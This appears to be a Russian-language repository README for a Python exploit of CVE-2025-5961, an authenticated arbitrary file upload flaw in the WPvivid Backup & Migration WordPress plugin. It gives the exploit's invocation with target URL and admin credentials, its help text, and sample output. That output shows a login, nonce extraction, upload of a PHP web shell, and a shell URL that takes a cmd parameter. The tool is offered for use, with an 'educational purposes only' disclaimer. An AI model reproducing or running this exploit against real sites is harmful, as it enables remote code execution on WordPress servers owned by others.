
Миграция, Резервное копирование, Развертывание – WPvivid Backup & Migration <= 0.9.116 - Аутентифицированный (Администратор+) Произвольная загрузка файлов
📈 Эта уязвимость затрагивает плагин с более чем 700 000+ установок
Плагин Migration, Backup, Staging – WPvivid Backup & Migration для WordPress уязвим к произвольной загрузке файлов из-за отсутствия проверки типа файлов в функции wpvivid_upload_import_files во всех версиях до 0.9.116 включительно.
Это позволяет аутентифицированным злоумышленникам (уровень Администратора и выше) загружать произвольные файлы на сервер, что потенциально позволяет выполнять удаленный код.
Этот репозиторий содержит эксплойт для CVE-2025-5961, написанный на Python, который:
python3 CVE-2025-5961.py -u http://target/wordpress -un admin -p password123
$ python3 CVE-2025-5961.py -h
usage: CVE-2025-5961.py [-h] -u URL -un USERNAME -p PASSWORD
CVE-2025-5961 Exploit by Khaled Alenazi (Nxploited)
options:
-h, --help show this help message and exit
-u, --url URL Target WordPress URL
-un, --username USERNAME
Admin username
-p, --password PASSWORD
[+] Checking plugin version...
[+] Detected plugin version: 0.9.116
[+] Target is vulnerable. Continuing exploit.
[+] Logging in to http://target/wordpress...
[+] Logged in successfully.
[+] Fetching WPvivid page to extract nonce...
[+] Extracted nonce: 502d5dce0e
[+] Uploading shell...
[+] Exploit succeeded!
[+] Shell URL: http://target/wordpress/wp-content/wpvividbackups/ImportandExport/shellnxploited.php?cmd=whoami
Exploit By: Khaled Alenazi (Nxploited) - https://github.com/Nxploited/
Этот скрипт предоставляется только для образовательных и исследовательских целей.
Автор не несет ответственности за любое неправомерное использование или ущерб, причиненный этим инструментом.
Khaled Alenazi (Nxploited)
🌐 GitHub